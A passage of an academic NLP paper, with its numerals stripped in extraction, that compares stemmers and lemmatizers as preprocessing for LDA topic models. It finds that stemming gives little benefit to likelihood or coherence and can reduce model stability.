to preprocess english corpora for topic modeling. in this work, we train and evaluate topic models on a variety of corpora using several different stemming algo- rithms. we examine several different quantita- tive measures of the resulting models, includ- ing likelihood, coherence, model stability, and entropy. despite their frequent use in topic modeling, we find that stemmers produce no meaningful improvement in likelihood and co- herence and in fact can degrade topic stability. introduction stemming is a popular way to reduce the size of a vocabulary in natural language tasks by conflating words with related meanings. specifically, stem- ming aims to convert words with the same “stem” or root (e.g “creative” and “creator”) to a single word type (“create”). though originally developed in the context of information retrieval (ir) systems, stem- mers are now commonly used as a preprocessing step in unsupervised machine learning tasks. it this work we consider one such application, topic model- ing. although stemmers are commonly used in topic models (liu et al., ; lo et al., ; nan et al., ; kamath s et al., ; su, ; jacobi et al., ), we find no empirical benefits for the practice. one could conjecture several reasons to stem for semantic models. first, conflating semanti- cally related words into one word type could im- prove model fit by intelligently reducing the space of possible models. given that reducing the fea- ture space randomly is already known to be poten- tially beneficial (ganchev and dredze, ), do- ing so in a semantically-inspired way might be even better. second, stemmers could reduce the effect of small morphological differences on the stability of a learned model. reducing the words “happy”, “happily”, and “happier” to one token may result in fewer possible models with divergent “happy” top- ics. third, stemmers approximate intuitive word equivalence classes, so language models based on stemmed corpora inherit that semantic similarity, which may improve interpretability as perceived by human evaluators. however, stemmers have the potential to be con- fusing, unreliable, and possibly even harmful in lan- guage models. first, many stemmers produce terms that are not recognizable english words and may be difficult to map back to a valid original word, such as “stai” as the porter stem of “stay”. sec- ond, although stemming aids document retrieval for many languages, english is a notorious exception (harman, ). in english, the complexity of compound affixes with meaning can lead to over- stemming, such as “recondition,” a word sharing a stem but not a root meaning with “recondite.” these complexities can also lead to the incorrect conflation of words with the same root but divergent meaning such as “absolutely” and “absolution”. third, and most troubling, there are cases in which morpholog- ical variants of the same stem carry significantly dif- ferent meanings. conflating “apple” and “apples” is uncontroversial, but loses the distinction between a device manufacturer and a type of fruit. transactions of the association for computational linguistics, vol. , pp. – , . action editor: hal daume iii. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. topic modeling is sensitive to preprocessing be- cause of its dependence on a sparse vocabulary (jockers and mimno, ). in practice, however, preprocessing methods are typically neither detailed nor justified, leading to problems in reproducibility (fokkens et al., ). we believe investigating the effects of stemming will inform researchers outside the core natural language processing community as to how to best preprocess their texts. while stemmers are used in topic modeling, we know of no analysis focused on their effect. we draw inspiration from prior studies of the effects of stemming for other tasks and models (harman, ; han et al., ; jivani, ; rani et al., ) to apply rule-based stemmers to a variety of corpora to test their effect on topic models. we evaluate the quantitative fit of the models generated and the qualitative differences between differently- stemmed corpora to investigate the effects each stemmer has on a corpus. we hope that these results help guide future researchers as to how to select and evaluate stemmers for a given task and corpus. background in this work we consider two categories of word nor- malization methods: rule-based stemmers, or stem- mers primarily reliant on rules converting one af- fix to another, and context-based methods, or strate- gies that use dictionaries and other contextual, in- flectional, and derivational information to infer the correct word root jivani ( ). we omit several language-independent strategies of text normaliza- tion, including those using markov chains (melucci and orio, ) and clustering (majumder et al., ). these methods are corpus-specific and error- prone, and we have not observed their use in topic modeling. in our evaluation, we consider nine different methods of word normalization, given below with two-letter labels. in addition to including popu- lar rule-based stemmers, we choose several sim- ple stemmers that are stronger and weaker than the named stemmers, where strength refers to how much the vocabulary is reduced. we will sometimes use other methods for word normalization include case folding and replacing classes of tokens with a constant (e.g. number for numerals). the more general term conflation treatment or sim- ply treatment to refer to these methods with respect to our corpus. these are compared to the control, no-stemmer treatment, ns. . rule-based treatments the first category, rule-based stemmers, includes methods primarily governed by a set of rules that convert one affix to another. most classic stemmers fit into this category, including the famous porter stemmer. these methods are quick, but also limited: no concise rule set captures every english morpho- logical exception, and these stemmers cannot use context to resolve ambiguous word types. they also are deterministic and consistent for each token: if word type a maps to stem b in one location, it will do so in every location word type a arises. treat- ments of this type therefore are effectively equiva- lence relations over untreated words, with a confla- tion class being an equivalence class of word types under a conflation treatment t. while jivani ( ) refers to these as “truncation stemmers” or “affix removal stemmers,” we find this naming confusing: stemmers rarely strictly truncate, and almost all stemmers aim to remove affixes. the core similarity of these methods is that all of the language-specific information used in these stem- mers is encoded directly into the rules they apply. truncation stemmers. k-truncation stemmers (bhamidipati and pal, ) remove all but the first k characters of a word. as a naı̈ve, high-strength method, they serve as a good baseline for the rela- tive effects of simple vocabulary reduction. we test four-truncation (t ) and five-truncation (t ). five- truncation has strength close to a strong rule-based stemmer; levels below four are incoherent. “s” stemmer. the s-removal stemmer or “s” stemmer (ss) removes s-based endings using only three rules. harman ( ) introduces the “s” stem- ming algorithm as a weaker and simpler counter- point to more standard rule-based stemmers. as the rules are simple and good representatives of the types of rules employed by the other stemmers in this section, we include them in table . lovins stemmer. the lovins stemmer (ls) is a rule-based stemmer using a two-step stemming al- gorithm (lovins, ). these steps use long lists of rules, but the method is still fast and simple to imple- if word ends with: . . . and does not end with: . . . replace ending with: -ies -aies, -eies -y -es -aes, -ees, -oes -e -s -ss, -us - table : the “s” stemmer of harman ( ) consists of three simple rules in order. only the first rule applicable in the first column is applied. ment and is generally considered a strong stemmer. porter and porter stemmers. the porter stem- mer (porter, ), one of the most popular in cur- rent use, is a slightly less strong and more intricate stemmer than lovins’. it uses five phases of rules and conditions that match patterns of vowel and con- sonant sequences. porter later created a slightly im- proved version of the porter stemmer for snowball, a programming language for rule-based stemmers (porter, ). we use both the original stemmer (p ) and the new version (p ) in our evaluation. paice/husk stemmer. the paice/husk stemmer (ph), or lancaster stemmer, iterates indefinitely over the same rule list, with some rules only ap- plying to unmodified words and others terminating iteration (paice, ). while slightly more com- plicated in rule structure, the paice/husk stemmer is similar to the lovins stemmer in strength. . context-based treatments while the methods above are fast, they are impre- cise, as a limited set of rules cannot account for all possible morphological exceptions. subtleties such as the difference between “frosting” windows and cake “frosting” are lost without contextual informa- tion. the methods below use tools such as dictio- naries, inflectional analysis, and part-of-speech in- ference to determine the correct conflated form of a word. as such, they may not consistently reduce the same word type to the same form. however, these tools also demand more computational resources; for our data, lemmatizing the corpus took more com- putational time than training the topic model. krovetz stemmer. the krovetz stemmer (krovetz, ) uses inflectional analysis and a dic- tionary to determine correct forms of words before removing word endings. this process is complex, but the stemmer itself is weak, as it aims less at conflating words with different parts of speech than normalizing verb forms and removing pluralization. the dictionary itself is crucial for implementation; for our krovetz stemmer treatment (ks), we use the lemur project implementation. lemmatizer. lemmatizers use a database of lem- mas, or standardized word forms, in order to find the best normalized word form for a given token. while the method is orders of magnitude slower than rule-based stemmers, it is also much more princi- pled and extremely unlikely to over-conflate. we use the wordnet-based lemmatizer (wl) implemented in the natural language toolkit (bird et al., ) along with a stanford pos tagger (toutanova et al., ) on the unmodified text to provide auxiliary part-of-speech information for the lemmatizer. model and data in this paper, we focus on modeling topics in english datasets using latent dirichlet allocation (lda), a generative model for documents based upon their topics (blei et al., ). a topic φ in this context is a multinomial probability distribution over words, without any embedded semantic model of how the words are connected. in lda, each document has a multinomial distribution θ over topics; a document d is generated by choosing a number of words, and for each word first sampling a topic k from θd, then a word w from the distribution over words φk asso- ciated with topic k. the name latent dirichlet allocation comes from the assumptions that information about each word’s topic or the original distributions θ and φ is latent (i.e. unobserved) and that the topic and word dis- tributions θ and φ are drawn from dirichlet distri- butions: θ ∼ dir(α), and φ ∼ dir(β). using this model, one can attempt to infer the most likely topics to generate a corpus for some preset number of topics k. however, the optimization problem is non-convex and intractable to solve analytically, and is thus generally solved using iterative techniques such as gibbs sampling, expectation maximization, or variational inference. the resulting topics fre- quently display themes within the common words in a topic that can be used for classification, search, and recommendation systems. because stemming affects the vocabulary distri- bution of a corpus, the optimal parameters of topic model inference will vary depending on treatment. we us adaptive optimization of both dirichlet hy- perparameters α and β. we use an asymmetric α and symmetric β to obtain the best model fit in ac- cordance with wallach et al. ( ). in order to test the various word normalization treatments, we used an existing python library for the lovins, paice/husk, and both porter algorithms (chaput, ), modified to correct errors in im- plementation. we implemented our own trunca- tion stemmers and s-removal stemmer. we applied each stemmer to each word token in four corpora: articles from arxiv in early , articles from the new york times in (sandhaus, ), bi- ographies from imdb, and reviews from the yelp dataset challenge. corpora were partitioned into % training documents, % test documents and lower-cased before conflation, which was performed per-sentence on lower-cased text. after treatment, we remove stopwords, digits, and punctuation. ta- ble shows details of the corpora, and table shows examples of each treatment. we train topic models using mallet (mccallum, ) for k = , , and , with at least nine models for each corpus, treatment, and k combination. training data evaluation data corpus # docs # toks # docs # toks arxiv articles . k . m . k . m imdb bios . k . m . k . m nyt articles . k . m . k . m yelp reviews k . m k . m table : training and test corpora represent considerable variance in content, size of corpus, average length of doc- ument, and proportion of training to test data. evaluations in order to evaluate the differences between confla- tion treatments of these corpora, we want to look at a variety of different types of evaluation of topic models. unfortunately, as described later, standard retrieved from arxiv (http://www.arxiv.org). courtesy of imdb (http://www.imdb.com). retrieved from yelp (http://www.yelp.com/ dataset_challenge). our code can be found at https://github.com/ heraldicsandfox/stemmers. evaluations of topic quality such as held-out likeli- hood and coherence are implicitly affected by the size of the vocabulary. to be able to compare dif- ferent treatments without simply favoring the maxi- mum possible vocabulary reduction, we create mod- ified versions of several existing classic evaluations as well as new metrics for understanding differences in models at the level of word types instead of topics. . held-out likelihood strong stemmers can improve the joint probability of documents occurring without improving the qual- ity of the model. as we reduce the size of the vo- cabulary, each topic-word distribution is spread over fewer possible words; at its extreme, the probabil- ity of any corpus under a zero-truncation stemmer would be . . experiments confirmed that for these treatments, the standard held-out likelihood score l of the test corpus based on the trained model ordered stemmers by how much they reduce the vocabulary, assigning the highest likelihood to those treatments with the smallest vocabularies. to account for the likelihood improvement caused by reducing vocabulary size, we normalize a model with k topics by the likelihood of a smoothed un- igram language model with the same β parameter. we calculate from the normalized log likelihood lnorm a per-token metric ptllnorm to put corpora of different lengths on a comparable scale. we com- pute the unigram model probability as a smoothed multinomial with prior β, number of instances of word type w in a corpus nw, vocabulary size w and total token count n: lunigram = ∏ j ∏ i nwij + β n + wβ ( ) lnorm = l/lunigram ( ) ptllnorm = log(lnorm) n = logl n − log(lunigram) n . ( ) our resulting metric measures how much on aver- age the introduction of multiple topics improves the probability of each token occurring. . topic coherence though log likelihood describes the statistical like- lihood of the topic model generating the corpus, it http://www.arxiv.org http://www.imdb.com http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge https://github.com/heraldicsandfox/stemmers https://github.com/heraldicsandfox/stemmers original this location does not have good service. went through drive-through and they forgot our drinks and our sides. while they were preparing what they forgot, we could see another girl who had her back to us and it was obvious that she was on her phone. any other kfc would be better. tokenized this location does not have good service went through drive through and they forgot our drinks and our sides while they were preparing what they forgot we could see another girl who had her back to us and it was obvious that she was on her phone any other kfc would be better stopped location good service drive forgot drinks sides preparing forgot girl back obvious phone kfc ns location good service drive forgot drinks sides preparing forgot girl back obvious ... t loca good serv driv forg drin side prep forg girl back obvi ... t locat good servi drive forgo drink sides prepa forgo girl back obvio ... lo loc good servic dr forgot drink sid prepar forgot girl back obv ... p locat good servic drive forgot drink side prepar forgot girl back obviou ... p locat good servic drive forgot drink side prepar forgot girl back obvious ... ph loc good serv driv forgot drink sid prep forgot girl back obvy ... ss location good service drive forgot drink side preparing forgot girl back obvious ... kr location good service drive forgot drink side prepare forgot girl back obvious ... wl location good service drive forget drink side prepare forget girl back obvious ... table : a demonstration of the steps of preprocessing on a yelp review. does not necessarily indicate topics that are seman- tically coherent to a human observer. to measure this, we use the topic coherence measure proposed by mimno et al. ( ). this metric is defined for a given topic k and a list of the top m words of a topic vk , . . .v k m as c(k) = m∑ m= m− ∑ l= log d(vl,vm) + β d(vl) + β ( ) where d(vl) is the number of documents in which word vl occurs and d(vl,vm) is the number of doc- uments in which both words vl and vm occur. this metric is similar to pointwise mutual information lau et al. ( ), but instead of using a sliding win- dow over the text to determine co-occurrence, it uses full documents as discrete windows. to avoid biasing towards the smaller vocabular- ies of stemmed datasets, we use the token-topic as- signments output by the topic model with the list of untreated tokens to produce untreated top keywords for each topic. we then use the original untreated corpus and these new keywords to compute coher- ence values. this allows us to observe whether con- flation treatments map tokens to the same topic in a more coherent way than untreated corpora would. we experimented with using wikipedia as a refer- ence corpus, but found it too general a reference for a semantic model in a narrow context such as a sci- entific paper or an actor biography. . clustering consistency if we treat topic models as clusterings of tokens, we can evaluate how consistent those clusters are. variation of information (voi), a symmetric mea- surement of difference between clusterings, allows us to evaluate how much of a difference stemming makes in the topics formed (meilă, ; grimmer and king, ). although some degree of vari- ation is inevitable between different trials with the same treatment due to randomness in the inference algorithm, stemming may affect how much occurs. we use two voi-based metrics to examine treatment stability and differences: intra-treatment voi and inter-treatment voi. intra-treatment voi is voi be- tween models trained with different random initial- izations but the same treatment. correspondingly, inter-treatment voi is the voi between outputted topic assignments from different treatments. if the inter-treatment voi is equal to the voi between tri- als of the same treatment, we infer that the change in treatment has made a negligible difference in the assignment of tokens to topics. . influential words the metrics above are all summary statistics that measure different types of overall topic model qual- ity. however, to understand why these metrics are affected the way they are, we also need some way to examine the individual components we have af- fected: the word types available in our documents. we use two heuristics to identify words that are most affected by a given treatment. the first uses inferred token probabilities in the test corpus. we want a scoring function of untreated word types that is positive if the estimated joint probability of to- kens of a particular pre-treatment type increases af- ter treatment, and negative if it decreases. we also want the magnitude of the score to correspond with both the difference in probability across all tokens and the relative informativeness of that token in dis- tinguishing documents or topics. for a given word type w from the untreated corpus and function t applying some conflation treatment, we compute the word type probability, tpwt, as d∑ d= nd∑ i= i[xdi = w] log(p(t(xdi) = t(w)| . . . )), ( ) where d is the number of documents, nd is the number of tokens in document d, xdi is the untreated word type of token i in document d and t(xdi) is the treated type, i[xdi = w] is the indicator func- tion that is if xdi = w and zero otherwise, and p(t(xdi) = t(w)| . . . ) is shorthand for the held- out likelihood estimate of treated token t(xdi) hav- ing the type w generated using the left-to-right tech- nique given the inferred parameters θ,φ and hyper- parameters α,β of the trained model. we average the quantity in equation across all topic models of the same corpus, topic count, and treatment to get tpwt. in order to compute a rela- tive score of the amount of probability improvement of an individual treatment for a word type from the no-stemmer treatment t , we take the difference be- tween topic probabilities, weighted by inverse docu- ment frequency (idf) to favor words that are specific to particular documents. our final score function is tpscorewt = (tpwt −tpwt ) log ( d dw ) , ( ) where dw is the number of documents of the total d containing at least one token of type w. the lowest negative scores indicate higher probability and im- portance of the unstemmed form of the token, while high positive scores indicate higher probability and importance of the stemmed form. while this does not produce a symmetric distribution, as we have not accounted for the increased probability of each word in a smaller vocabulary, it allows us to sort words by how much their probability of occurring has changed between treatments and how much that word affects the corpus as a whole. the second heuristic tests whether stemming in- creases or decreases certainty of the topic assign- ment for each stemmed word type. intuitively, cor- rect conflation should reduce the information en- tropy across tokens of a given conflation class by forcing words with the same root to be treated as a single word in inference. topic models are in- tuitively better when words are sparsely distributed across topics; consequently, we prefer lower entropy across topics, or mass concentrated in only a few topics. a negative value for a word type under this entropy metric favors the stemmed corpus, while a positive score favors the untreated corpus. in this case, for a given word type w, we use the topic assignments from the final iteration of gibbs sampling to compute the number of instances of w assigned to each topic k. to preserve the sparsity inferred by the algorithm, we use this to generate a maximum-likelihood estimate of the probability dis- tribution of w being assigned to each topic, from which we can compute the shannon entropy: hwt(k) = − k∑ k= nwk nw log ( nwk nw ) , ( ) where nwk is the count of all tokens of type w as- signed to topic k. for each treated form of a word w by a treatment t, we also consider the inverse im- age t− (w), or the set of all words that stem to have form w. we therefore compute a change in entropy using average h̄wt across all trials with treatment t and control t for a given corpus and topic count, ∆hwt(k) = h̄wt(k) − h̄t− (w)t (k), ( ) where h̄t− (w)t is the information entropy for the topic-word counts summed across all untreated types that conflate to type w under treatment t. results to evaluate the effects of conflation on topic mod- els, we produced several thousand inferred models. we apply the metrics described in section , com- puting means and standard errors across trials with the same topic count, corpus, and treatment where possible to ensure significance. . treatment strength many factors contribute to the general concept of “strength” of a stemmer, but the most obvious sig- nal is the amount by which a stemmer reduces the vocabulary of a corpus. after stopword removal, we count the total number of unique word types in our stemmed corpus for each treatment and training cor- pus, as well as the average number of characters in each word after treatment. comparing type-token ratios of rule-based stemmers to the untreated cor- pus gives a measurement of the ratio of untreated words to conflation classes under that treatment. we display these counts in figure . the results of these stemming treatments already demonstrate that stemmer strength can depend heav- ily on the type of corpus on which it is applied. for instance, the krovetz stemmer actually increases the size of the vocabulary of arxiv, whereas it produces more vocabulary reduction than the lemmatizer on both imdb and yelp. the proportions of rule-based stemmer type-token ratios are consistent across cor- pora, with the exception of truncation on arxiv. the frequent use of scientific prefixes (such as “inter” and “anti”) and bad conversion from pdf format in arxiv lead truncation stemmers to conflate at a higher rate than they do on other corpora with re- spect to other rule-based stemmers. the three dif- ferent light stemming methods — the s-stemmer, the krovetz stemmer, and the wordnet lemmatizer — perform similarly on the imdb corpus, but vary substantially across the other three corpora. character-token ratios vary less between corpora than type-token ratios. five-truncation produces words with an average length near the paice-husk and lovins stemmers. not surprisingly, s-stemming produces an average word length slightly less than the untreated corpus, while the krovetz stemmer and wordnet lemmatizer vary in strength across cor- pora. we also verify some expected results for these stemmers: truncation stemmers are very strong, with four-truncation reducing vocabulary size to one- fourth or one-fifth of the original. the porter stem- mers behave similarly to each other, with slightly more liberal stemming by the porter stemmer on figure : type-token ratio and character-token ratio vary substantially across training corpora and conflation treat- ments. due to the context-sensitive stemming done by the krovetz stemmer, it is possible for one untreated word type to map to multiple stemmed types, producing a greater type-to-token ratio for the arxiv version of the krovetz stemmer than for the original untreated corpus. all corpora but arxiv. the paice-husk and lovins stemmers are both stronger than porter, while the s- stemmer is consistently weaker. while the vocabu- lary of a corpus affects the strength of each stemmer, it does little to affect the strengths of the rule-based stemmers relative to each other. . held-out likelihood using our normalized log likelihood measure from equation , we can compare likelihoods across all our different treatments, as shown in figure . we observe for all standard rule-based stemmers treat- ments provide little likelihood benefit apart from reducing the vocabulary size; the porter stemming figure : while light conflation treatments may help particular corpora, word conflation generally decreases the statistical fit of a topic model proportionally to its strength as measured in normalized log likelihood. con- fidence intervals are the p = . range of belonging to the distribution of that treatment’s normalized log likeli- hoods across at least samples each. higher values of normalized log likelihood represent better model fit. treatments result in normalized log likelihoods sig- nificantly lower than the unstemmed treatment. sta- tistically, the porter stemmers do not appear to be improving the quality of the model; they are merely reducing the possible unigrams it could generate in a moderately principled way. both paice/husk and lovins have the same problem, but as they are stronger stemmers, problems of overconflation seem to reduce the quality further. more surprising, however, is the mediocre per- formance of the wordnet lemmatizer. the fact that yelp and imdb do not see an improvement with use of the lemmatizer is easy to explain away: these corpora contain slang, misspellings, and plenty of proper names, enough to make lemmatization a challenge. however, we see the same result in the case of new york times articles, an ideal corpus for topic modeling. while there are still many named entities, they arise in carefully-edited text with stan- dardized journalistic vocabulary. other observations are less surprising. five- truncation produces likelihoods comparable to the stronger lovins and paice/husk stemmers, and sig- nificantly better than either for the -topic yelp model. this may relate to the irregularities of re- view text: words elongated for emphasis (e.g. “hel- loooo”) and other oddities of online informal en- glish are hard for rule-based suffix stemmers to han- dle but still benefit from naı̈ve forms of conflation. the porter and porter stemmers are not signifi- cantly different in any case, which serves as com- forting validation that those not using the new gen- eration of the porter stemmer are not losing much. . topic coherence log likelihood measures can tell us about statisti- cal fit, but do not necessarily tell us about the actual apparent coherence of the model in terms of concep- tual similarity of words in a topic. in figure , we display the negative average coherence scores from equation for each treatment. the hypothesis we test is that using a conflation treatment should map morphologically different words with a shared con- cept to the same word, automatically constraining the topic model to ensure closely-related words are proportionally present in the same topics. our results do not conform to this intuition. the majority of treatments are statistically indistin- guishable from the untreated control with respect to coherence. the relative effects of these treat- ments on coherence are magnified as the number of topics increases; while no arxiv treatment dif- fers significantly in coherence at topics, at , the four strongest treatments (lovins, paice-husk, five-truncation and four-truncation) are significantly worse. four-truncation suffers a similar effect on imdb at and topics. in contrast, four- truncation actually improves in coherence compared to other treatments on yelp as the number of topics increases, reaching a significant level at topics. figure : conflation treatments introduce no significant difference in almost all cases in the resulting average neg- ative topic coherence of each model according to token assignments. smaller values indicating better coherence, and error bars represent the p = . range of possible mean values. given the lack of substantial statistical difference across a variety of treatments, it seems safe to con- clude that the use of stemmers is not substantially improving the encoding of word similarities in these topics. the topic model itself on the untreated cor- pus is perhaps already doing as good a job ensuring that words in the same conflation class have statisti- cally similar topic distributions. unstemmed topics sometimes contain words from the same conflation class (e.g. “restaurant” versus “restaurants”). while these might give a slight ad- vantage in coherence measures, this case implies that the stemmers are not necessary for bringing to- gether morphological variants in topics. . clustering consistency another hypothesized effect of stemming is that it will produce more consistent results by reducing the sensitivity of related words to random initialization. we can use variation of information (voi) to un- derstand how these models differ from each other relative to how much they vary between random ini- tializations. we summarize the results in figure . within statistical error bounds, intra-treatment voi is always less than or equal to the variation across treatments, and voi increases as the number of topics increases. on arxiv, the light treatments — the krovetz stemmer, s-stemmer, and wordnet lemmatizer — behave indistinguishably from the untreated corpus. the intra-treatment voi trend shows that stronger treatments generally result in less consistent models. this contradicts the intuition that stemming will help place words with similar meaning into the same topic. while stemming con- strains all conflated word types to share one prob- ability in each topic, it does not ensure that those probability distributions will favor few topics. there are two striking exceptions to this trend. the first is the krovetz stemmer. the intra-treatment voi of krovetz topic models stays closer to that of the untreated corpus than the s-stemmer or the wordnet lemmatizer. however, the higher inter- treatment voi between krovetz and the unstemmed corpus suggests that the krovetz stemmer produces small but significant changes in the optima of the topic model. for imdb, nyt, and yelp at top- ics, and nyt again at topics, the voi between the untreated corpus and krovetz-stemmed corpus is significantly greater than the voi of the untreated corpus with itself. in contrast, the variation of infor- mation between untreated and s-stemmed corpora is only negligibly higher than the intra-treatment voi of the s-stemmer. this is interesting given the repu- tation of krovetz as a weak stemmer. the second exception is the five-truncation stem- mer. though a very strong stemmer, its voi is in- distinguishable from the heavier lovins and paice- husk stemmers on most corpora, but when applied to yelp with topics, it actually does significantly better than either, in both intra-treatment and inter- treatment voi with the unstemmed corpus. this ef- fect can be seen to a less significant extent in mod- figure : the variation of information between different treatments of corpora indicates that while light stemming may improve the comparative similarity of topic models, heavier stemmers produce less stable topic assignments. the minimum for statistical significance is computed as the maximum p = . value for any topic model as compared with itself (i.e. the % confidence interval on the diagonal). els with fewer topics over yelp. this does not im- ply that five-truncation is a competitive stemmer, but rather illustrates that by this measure strong stem- mers perform worse than a naive baseline on a cor- pus with short words and irregular text. . influential words to identify word types that positively or negatively affect the quality of the model after stemming, we use our idf-probability and entropy metrics for each word type. the idf-probability metric strongly indi- cates that while conflation improves probability of words on average, the improvement applied primar- ily to conflated words. untreated words that do not share a conflation class under a treatment (e.g. “mar- quess”) often become less probable on average after stemming. their inferred hyperparameters are larger and thus encourage less sparsity in stemmed topic models; as a result, the probability of rarer words in their own conflation classes decreases as that prob- ability is more distributed across topics. this also increases the entropy of stemmed words from a size- one conflation class. we can confirm several hypotheses from earlier in the paper using these methods. for entropy dif- ferences, those conflation classes with the greatest weighted probability improvement for the truncation stemmers in arxiv include huge conflation classes of words with the same prefix but wildly different roots. in effect, these have forced sparsity where it should not necessarily have been, degrading coher- ence. as exemplified in the -topic nyt models, the porter stemmer improves the likelihood of com- mon words, like “street” (tpscore = ) and “mr” (tpscore = ), an outcome aligned with the rule-based stemmer’s aim to cope well with com- mon words. but for rarer words like “purgative” (tpscore = − . ) and “pranks” (tpscore = − . ), no such improvement is seen. these com- mon words do not have extreme entropy values, which supports our hypothesis that while the likeli- hood of common words improves with porter stem- ming, those words were already in the same topic and did not affect model coherence. while we cannot use the same entropy measurement on the context-sensitive lemmatizer, we see the same ef- fect, where the most-improved words are the most common, and the less-likely words in the stemmed model are rare words and names. interesting results also arise from the five- truncation stemmer. unlike prescriptive rule-based stemmers, the truncation stemmer does not produce more errors when typos arise; in fact, it can ac- commodate typos at the ends of words in a way that other stemmers cannot. while, once again, we observe that the word probabilities of truncated words are much improved for common words and slightly reduced for rare words, we discover that the best entropy improvements from untreated to stemmed words are elongated words and exclama- tions such as “eeeee” (∆hw(k) = − . ) and “haaaa” (∆hw(k) = − . ). at the opposite score extreme, several classes of words with many mis- spellings have increased entropy after stemming, but this is potentially misleading; topic models are very good at distinguishing dialects, and system- atic misspellings are likely to create differently- spelled but semantically similar topics in a many- topic model. over one hundred words conflate to “defin” with five-truncation, including upwards of sixty misspellings of “definitely,” which removes distinction between good and bad spellers that might be correlated with other features. related work we are not aware of other work evaluating a vari- ety of stemmers and conflation techniques on topic models. some prior work exists that evaluates the effect of stemming. several conflation methods were tested on a variety of document clustering algo- rithms by han et al. ( ), finding that they could reduce the number of features effectively but that the correct choice of stemmer varied. more recently, stankov et al. ( ) developed a stemmer to im- prove document clustering. both of these techniques demonstrate an improvement in clustering results and a reduction in features required, with the for- mer also introducing the notion of tradeoff between the precision of lemmatization and the efficiency and strength of stemmers. additionally, a variety of work exists in the gen- eral field of stemmer evaluation, though much of it centers on the information retrieval community. in particular, the work of harman ( ) highlights some of the fundamental issues of strong stemming, including the potential positive effect of light stem- mers like the s-removal stemmer. the notion of stemmer strength is detailed further by frakes and fox ( ), as well as several more precise met- rics of evaluation of stemmer strength. survey pa- pers from jivani ( ) and rani et al. ( ) detail the different existing stemming and conflation tech- niques for machine learning applications, including several statistical stemming algorithms that do not rely on a fixed set of rules. findings suggest that, while these statistical methods have potential, many are inefficient, complex, and difficult to calibrate well enough to produce good results. though we look forward to seeing the future development of these stemmers, for this work we chose to focus on simpler and more widely used methods. conclusion despite its abiding popularity, stemming does not improve coherence after controlling for the size of vocabulary, and may actually reduce predictive like- lihood and increase sensitivity to random initializa- tions. in most cases, the topic model was already grouping together common words with the same root on its own, and gained little by better model- ing rare words. light treatments seem to fare better than strong stemmers, with krovetz doing particu- larly well for well-proofread corpora, but the small differences between words that these target such as pluralization and verb conjugation are often already captured by semantic models like lda. in certain cases, a stemmer may encode an as- sumption that is useful for coping with a corpus with heavy variation, as with the -truncation stemmer helping to correct misspellings on yelp. while this does not improve the quality of the topic model by most measures, it may be suited for a particular task involving abnormally varied word forms to which the model is applied. however, for stemmers encod- ing standard rules of spelling and grammar, such a benefit is unlikely. given the overly-strong effects of truncation stemming, we suggest using a stem- mer as a method of discovering misspellings to fix instead of as a way of repairing them. a common motivation for stemming is to display more succinct results by not repeating minor mor- phological variations (such as “place” and “places” unstemmed room hotel stay rooms pool nice stayed strip night bed check clean bathroom desk casino vegas free front resort shower stemmed after training room hotel stai pool nice strip night bed check clean bathroom desk casino vega free front resort shower stemmed before training room hotel stai pool nice bed check strip night vega suit casino clean bath- room view desk resort dai walk area table : an example topic from an unstemmed yelp -topic model with redundant keywords demonstrates that stemming after modeling produces the same appar- ent high-probability words as stemming before. in the case of yelp). as an alternative we suggest post-stemming the list of keywords, as shown in ta- ble . stemming a list of top words after modeling allows topic models to exploit the nuances of mor- phologies, such as “apple” and “apples” with respect to the company and the fruit, while still allowing the eventual viewer to browse through the resulting concepts quickly. post-stemming is computationally much cheaper than stemming the full corpus, requir- ing only a slightly longer input list of most probable terms. because context is unavailable for keywords and strong stemmers reduce readability, we would suggest using the s stemmer or a modification of the porter stemmer to return to english word forms. vocabulary curation can have a profound effect on the results of statistical models, yet procedures for vocabulary curation have largely been left to unex- amined convention and undocumented folk wisdom. we find that a commonly used method, stemming, provides little measurable benefit and may in fact be harmful. as text mining becomes more influential outside core nlp research, more attention must be paid to these issues. acknowledgements we would like to thank jacob gardner, jack hessel, andrew loeb, brian mcinnis, and elly schofield for helping to refine the writing in this paper. we also would like to thank the tacl editors mark john- son and hal daumé iii and the reviewers for their thoughtful comments and suggestions. the first au- thor was funded by a cornell university fellowship. references narayan l bhamidipati and sankar k pal. . stem- ming via distribution-based word segregation for clas- sification and retrieval. systems, man, and cyber- netics, part b: cybernetics, ieee transactions on, ( ): – . steven bird, ewan klein, and edward loper. . nat- ural language processing with python. o’reilly me- dia. available at: http://www.nltk.org/book/. david m blei, andrew y ng, and michael i jordan. . latent dirichlet allocation. the journal of ma- chine learning research, : – . matt chaput. . stemming library. available at: https://bitbucket.org/mchaput/stemming. antske fokkens, marieke van erp, marten postma, ted pedersen, piek vossen, and nuno freire. . off- spring from reproduction problems: what replication failure teaches us. in proceedings of the st acl, pages – . william b frakes and christopher j fox. . strength and similarity of affix removal stemming algorithms. in acm sigir forum, volume , pages – . acm. kuzman ganchev and mark dredze. . small sta- tistical models by random feature mixing. in proceed- ings of the acl hlt workshop on mobile language processing, pages – . justin grimmer and gary king. . general pur- pose computer-assisted clustering and conceptualiza- tion. pnas, ( ): – . pu han, si shen, dongbo wang, and yanyun liu. . the influence of word normalization in english docu- ment clustering. in computer science and automation engineering (csae), ieee international con- ference on, volume , pages – . ieee. donna harman. . how effective is suffixing? jour- nal of the american society for information science, ( ): – . carina jacobi, wouter van atteveldt, and kasper wel- bers. . quantitative analysis of large amounts of journalistic texts using topic modelling. digital jour- nalism, ( ): – . anjali ganesh jivani. . a comparative study of stemming algorithms. international journal of com- puter technology and applications, ( ): – . matthew l jockers and david mimno. . significant themes in th-century literature. poetics, ( ): – . sowmya kamath s, atif ahmed, and mani shankar. . a composite classification model for web ser- vices based on semantic & syntactic information inte- gration. in advance computing conference (iacc), ieee international, pages – . ieee. robert krovetz. . viewing morphology as an in- ference process. in proceedings of the th annual international acm sigir conference on research and development in information retrieval, pages – . acm. jey han lau, david newman, and timothy baldwin. . machine reading tea leaves: automatically evaluating topic coherence and topic model quality. in proceedings of the association for computational lin- guistics, pages – . zhiyuan liu, wenyi huang, yabin zheng, and maosong sun. . automatic keyphrase extraction via topic decomposition. in proceedings of the conference on empirical methods in natural language processing, pages – . association for computational lin- guistics. siaw ling lo, david cornforth, and raymond chiong. . effects of training datasets on both the extreme learning machine and support vector machine for tar- get audience identification on twitter. in proceedings of elm- volume , pages – . springer. julie b lovins. . development of a stemming al- gorithm. mechanical translation and computational linguistics, : – . prasenjit majumder, mandar mitra, swapan k parui, gobinda kole, pabitra 